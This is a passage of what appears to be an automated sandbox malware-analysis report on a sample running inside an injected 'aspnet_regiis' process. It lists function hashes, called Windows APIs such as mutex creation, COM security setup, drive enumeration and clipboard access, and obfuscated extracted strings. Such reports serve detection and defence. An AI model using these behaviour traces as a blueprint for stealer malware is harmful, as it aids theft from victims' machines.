                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8a91ff8b0fa27f7d43ca47714211126ff68ff85ca3e8d8384a8484bbf2cd18a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05C19C715083118BC714DF18C8A17ABB7F1FF86394F058A1DE8965B390E7B8E944CB9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ONIH$ONIH
                                                                                                                                                                                                                                            • API String ID: 2994545307-1025764487
                                                                                                                                                                                                                                            • Opcode ID: a21bc5579434c508fa49aa0dc3e083849947e0343cf962c933246f847483d8e0
                                                                                                                                                                                                                                            • Instruction ID: 6760f1ed0ae1d329c4b663ab63501930252020e06147d9e554caa7ccdeb9e281
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a21bc5579434c508fa49aa0dc3e083849947e0343cf962c933246f847483d8e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4491B031A08312ABD710CF19C880A5BB7E2FF89754F15D92DF8889B361D738DD558B8A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9e8f4aefef329fc62512f11f361ec012ddadb9d6937bec9483e218d40e6b2f47
                                                                                                                                                                                                                                            • Instruction ID: 8af835d313e2c9841ed32225ee666157595f5a07326701f743ca198a8088bda5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e8f4aefef329fc62512f11f361ec012ddadb9d6937bec9483e218d40e6b2f47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FA1AEB15083518FC728CF18C4516ABB7E1EFC9304F154A6EE9A58B3A2D779E841CB86
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LdrInitializeThunk.NTDLL(00435B02,005C003F,00000002,00000018,?), ref: 0043344E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /.)(
                                                                                                                                                                                                                                            • API String ID: 0-2587180175
                                                                                                                                                                                                                                            • Opcode ID: be353cfc7e6071974f0cc9e01a84c59092a96f9cbbd0c4b219b7bd4caacb1746
                                                                                                                                                                                                                                            • Instruction ID: b5dbb834104e65541a845c2784164149e464bb52038cd636ecc33fb355af6764
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be353cfc7e6071974f0cc9e01a84c59092a96f9cbbd0c4b219b7bd4caacb1746
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A81F0755083508BD334CF14D851BABB3E6FFC6314F004A2EE999AB391DB789944CB9A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bab2c55bc4404ab8ce3902f7bc404aea43873b09e886b96d9e120b1a5bb2e258
                                                                                                                                                                                                                                            • Instruction ID: 402cdcd4ece5080350428a361fa4c3611106bf6e40d7dfc67145bd516114109a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bab2c55bc4404ab8ce3902f7bc404aea43873b09e886b96d9e120b1a5bb2e258
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC029FB19083528FC324DF18C4906ABB7F1FF95754F14892EE4C997360E7789985CB86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 353b3bc74084b0ad410563bba82899c40e59e4c87989eec0f911ef09384e3fb9
                                                                                                                                                                                                                                            • Instruction ID: 57bfe7de44fd4f0d957004b99b247f14d9512e7ace01bf03f7595e03a5f0512f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 353b3bc74084b0ad410563bba82899c40e59e4c87989eec0f911ef09384e3fb9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 490234B1600B018BE328CF29D8917A7B7E1FB49314F404A2DD8EB9BB91D774B545CB98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 571514df7261df35181ce4100fa65b6cdafc8cfe888ce2de327cfc14cb12f88c
                                                                                                                                                                                                                                            • Instruction ID: 7aa4a68fb1a406591e873f0a7b4481dd7c296bcf25ae582fb60e216677dbcf76
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 571514df7261df35181ce4100fa65b6cdafc8cfe888ce2de327cfc14cb12f88c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4D123715083419FC700CF29D4906ABBBE2AF86304F18897EF8D997392D738D94ACB56
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8cdcd46b47a7acccd5ce5fda590817870b14aa15f5fc9a49a9351c7c776761c2
                                                                                                                                                                                                                                            • Instruction ID: c2deaf1f563ad6545443d3b74acdecb165153a16474d3365eef8859d6fa0cbdd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cdcd46b47a7acccd5ce5fda590817870b14aa15f5fc9a49a9351c7c776761c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D518870600B01CBE720CF25D8917A7B3F1FF4A344F00496DE49B9BAA1E774A545CB98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9df3fc48b5d634b163faf951f84c7f019b44d804db62c0a723af3165d37282de
                                                                                                                                                                                                                                            • Instruction ID: 090d55a522e5177afdf66720a6ecdd842a0bbc621113678ea8f440565db5b1f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df3fc48b5d634b163faf951f84c7f019b44d804db62c0a723af3165d37282de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E417B75518344ABD300DF28DC41BABB7E8EF89754F004A2DF998D3281D738DA45CBAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 914d1c6d9fef2c15bb3dee97aed70c4891043c7da93b47b7199dd0d595c054bf
                                                                                                                                                                                                                                            • Instruction ID: 7eeb821f6f26ed2fb21c31df3371f28833529de801bcf169f62832fc727c815b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 914d1c6d9fef2c15bb3dee97aed70c4891043c7da93b47b7199dd0d595c054bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7751F8B1A14B409FD360DF3DC946796BAE4AB09220F144B5DF8B9CB3D0E334A9118BD6

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 851 409450-409480 call 4096b0 call 432fe0 856 409482 851->856 857 409487-40951b 851->857 858 409678-409684 ExitProcess 856->858 859 409520-40952a 857->859 859->859 860 40952c 859->860 861 409532-409537 860->861 862 409539-409568 861->862 863 40956a-409591 CreateMutexW call 42bba0 861->863 862->861 866 409593 863->866 867 409598-4095ba CoInitializeEx 863->867 868 409659-409661 866->868 869 4095c1-40961b CoInitializeSecurity 867->869 870 4095bc 867->870 873 409663 868->873 874 409665-40966b CloseHandle 868->874 871 40961d 869->871 872 40961f-409626 call 40a700 869->872 870->868 876 409651-409657 CoUninitialize 871->876 881 409628 872->881 882 40962a-409645 call 409690 call 40cfa0 872->882 875 409671-409676 call 433320 873->875 874->875 875->858 876->868 881->876 886 40964a-40964f call 40be80 882->886 886->876
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 0040962A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateExitMutexProcess
                                                                                                                                                                                                                                            • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                                                                                                                                                                                                                                            • API String ID: 3437166654-780655312
                                                                                                                                                                                                                                            • Opcode ID: 299175d5a21dc3d4e509039720b6acf80a1e39d2dd4d1ea4b4756c0bba8fc5bd
                                                                                                                                                                                                                                            • Instruction ID: 13efb928bf53d29c910cda108476fd38d124234316b912b192e036211ebbd97f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 299175d5a21dc3d4e509039720b6acf80a1e39d2dd4d1ea4b4756c0bba8fc5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8613E70008B82DAD3219F3CC84871ABFA06B62324F148B6DE4E55B6D2D379A955C7DB

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 902 426dea-426e48 903 426e4d-426e57 902->903 903->903 904 426e59-426e60 903->904 905 426e66-426e6c 904->905 906 426eb4-426f07 SysAllocString 905->906 907 426e6e-426eb2 905->907 908 426f11-426f28 906->908 907->905
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocString
                                                                                                                                                                                                                                            • String ID: Q$S$Y$[$]$_
                                                                                                                                                                                                                                            • API String ID: 2525500382-2253995114
                                                                                                                                                                                                                                            • Opcode ID: eb31286e2d1dc163bbe2f61ea6679ab6c77704470cbdc80e10a341dbf722ce6d
                                                                                                                                                                                                                                            • Instruction ID: ae6c1d55f4fbaac91964c2ff081fd6d3881d0ce100ae23d53f9fc50850ab4047
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb31286e2d1dc163bbe2f61ea6679ab6c77704470cbdc80e10a341dbf722ce6d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B412870108B81CFD725CF38C494746BFE1AB56314F188A9DD8EA8F396C7B59505CBA2
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocString
                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                            • API String ID: 2525500382-4108050209
                                                                                                                                                                                                                                            • Opcode ID: 6eb5b39d5e68e32b6f50ba3d7bc30861a25c39970a78de5f9efc7a1a9ed378eb
                                                                                                                                                                                                                                            • Instruction ID: b25a69b070ac93bc8331e55e898bdda6be772d86962f9bed59cca751c92aa313
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6eb5b39d5e68e32b6f50ba3d7bc30861a25c39970a78de5f9efc7a1a9ed378eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAA1E660108BC2CED726CF3C8488602BF916B66224F0987DDD9E94F3EBC769D546C766
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00431CD9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID: |MJK
                                                                                                                                                                                                                                            • API String ID: 1279760036-2474107196
                                                                                                                                                                                                                                            • Opcode ID: e0c071d31afe22bc61692940e342b2b6046174c7cc859ce7716a8745185c3cd4
                                                                                                                                                                                                                                            • Instruction ID: 1f5176670e450a89f4d9f2f55dac48342306c35d18e8cafb4f4596adf7f0ef98
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0c071d31afe22bc61692940e342b2b6046174c7cc859ce7716a8745185c3cd4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98015E746083409BD305EF18D850B1AFBE5EB85714F10895CE8C8873A1D7799C51CB86
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00433304
                                                                                                                                                                                                                                            • GetLogicalDrives.KERNELBASE ref: 0043330F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrivesLogical
                                                                                                                                                                                                                                            • String ID: d)z'$QS$Y.[
                                                                                                                                                                                                                                            • API String ID: 999431828-2110187971
                                                                                                                                                                                                                                            • Opcode ID: 64d1ddfafbeb7dbdfcc1548b6b72c393f2904483376007562b5627046e68e9e2
                                                                                                                                                                                                                                            • Instruction ID: e8e89344f43158168d04a207317a34bf2a7d647b3148a4884292e8bdcfdaf679
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64d1ddfafbeb7dbdfcc1548b6b72c393f2904483376007562b5627046e68e9e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57B00270565110CBD7047B62FD0A1883670BE41306B61A5BAB462414B58A7508028A1D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                                                                                                            • Opcode ID: 46c9c2a6df09579181b67bc1c232c35714d83a6e77756d87258da728de65401f
                                                                                                                                                                                                                                            • Instruction ID: e05fb8287dab851cfe41e4891bc83798da47b2845a4ada711733d3c5d86edf7d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46c9c2a6df09579181b67bc1c232c35714d83a6e77756d87258da728de65401f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96414630109B81CFD725CF69C4D4B56BBE1AF5A314F188A9CD8EA4F396C774A405CB62
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00433212), ref: 004333E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: 19608911a92fe9e66a4b44842a9100894de7f8a3b13ee89843ba694be8c9e91a
                                                                                                                                                                                                                                            • Instruction ID: 9dd768d601c797eced0f1fb32fab73dd23290a1807d3286c737dec57ffa6aa2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19608911a92fe9e66a4b44842a9100894de7f8a3b13ee89843ba694be8c9e91a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7421D2756093009BD300AF25D94065FBBA6EFC5320F14CA2DE8D5536A0D739E9168B96
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 00431D9D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                            • Opcode ID: 70dc42085aaf31cc5f858da0208b76ae241e065b9f352727883c8acff1e3d881
                                                                                                                                                                                                                                            • Instruction ID: faaa2a28f5432dcfadff1aa72760d1e072794e38e9bb7aacaa6c4667ba833b62
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70dc42085aaf31cc5f858da0208b76ae241e065b9f352727883c8acff1e3d881
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9015E352016418FE3248F65D590B56BBA2EB8A719F38C56DC2944B796C376A813CB80
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 0042D31E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 95929093-0
                                                                                                                                                                                                                                            • Opcode ID: 3358f6322c01d65db6a2a4cf3f09841afe0edb6815a1b837b2a9a41a1e5be685
                                                                                                                                                                                                                                            • Instruction ID: aff2c92bc4d4b27329d6e5fa62865eb3abd2dec53eca03b05e8178db0af3ab4e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3358f6322c01d65db6a2a4cf3f09841afe0edb6815a1b837b2a9a41a1e5be685
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0A0755096408FC340FF74D89A59A7FE0BF4A308F0948BDD4888B393DA39A805DB17
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                                                            • Opcode ID: dca9fa13eb6518aa7513e625cedd8848dd1d49183d4641ce7667f60a636072c3
                                                                                                                                                                                                                                            • Instruction ID: c29900f15a509b6493635a3ed7949470728e2a13a015c4b09a1b3d31d1d40ce3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dca9fa13eb6518aa7513e625cedd8848dd1d49183d4641ce7667f60a636072c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F01FB45187028FE310EF29D1A871ABBE0FB85304F10991CE4998B390D7B9A949CF82
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                                                            • Opcode ID: 9b655a951d31a9f2448cd24b8c500a46a0953401fc987897c0c1ba38a5b523a6
                                                                                                                                                                                                                                            • Instruction ID: d467d3133f7384133c76753659c13c7a12f22952b1d66411aeb1b83060704726
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b655a951d31a9f2448cd24b8c500a46a0953401fc987897c0c1ba38a5b523a6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F098701087028FE311DF25C5A570BBBE5BB80304F10C95CE4954B394DBB9AA49CFC2
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalDrives.KERNELBASE ref: 0043330F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrivesLogical
                                                                                                                                                                                                                                            • String ID: d)z'$QS$Y.[
                                                                                                                                                                                                                                            • API String ID: 999431828-2110187971
                                                                                                                                                                                                                                            • Opcode ID: 2c4b6404e12a9b96dcd039e5cea7e87561d96a4f4e51accb407370de3064d5e2
                                                                                                                                                                                                                                            • Instruction ID: 59667aa5795c8fe6406a15d3fa6421a4c6f9c71bb4292e92270e6e51c95fa777
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c4b6404e12a9b96dcd039e5cea7e87561d96a4f4e51accb407370de3064d5e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42A00270525110CBD7043B23FD0A1883670BB41306B61A9BBB432414B58A7508018E0D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1647500905-0
                                                                                                                                                                                                                                            • Opcode ID: ebf3928754cadb559de669f953e17727069e132b88399d4d124d64f2fc343997
                                                                                                                                                                                                                                            • Instruction ID: a16aa55f13b6d64af1caf6905559e6795c1c60601db4727199c5a264373b4f72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebf3928754cadb559de669f953e17727069e132b88399d4d124d64f2fc343997
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B41E370A08B818FD314EF39D548356FFE1AB42314F04CA2DC0E68BB81D379A859DB96
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
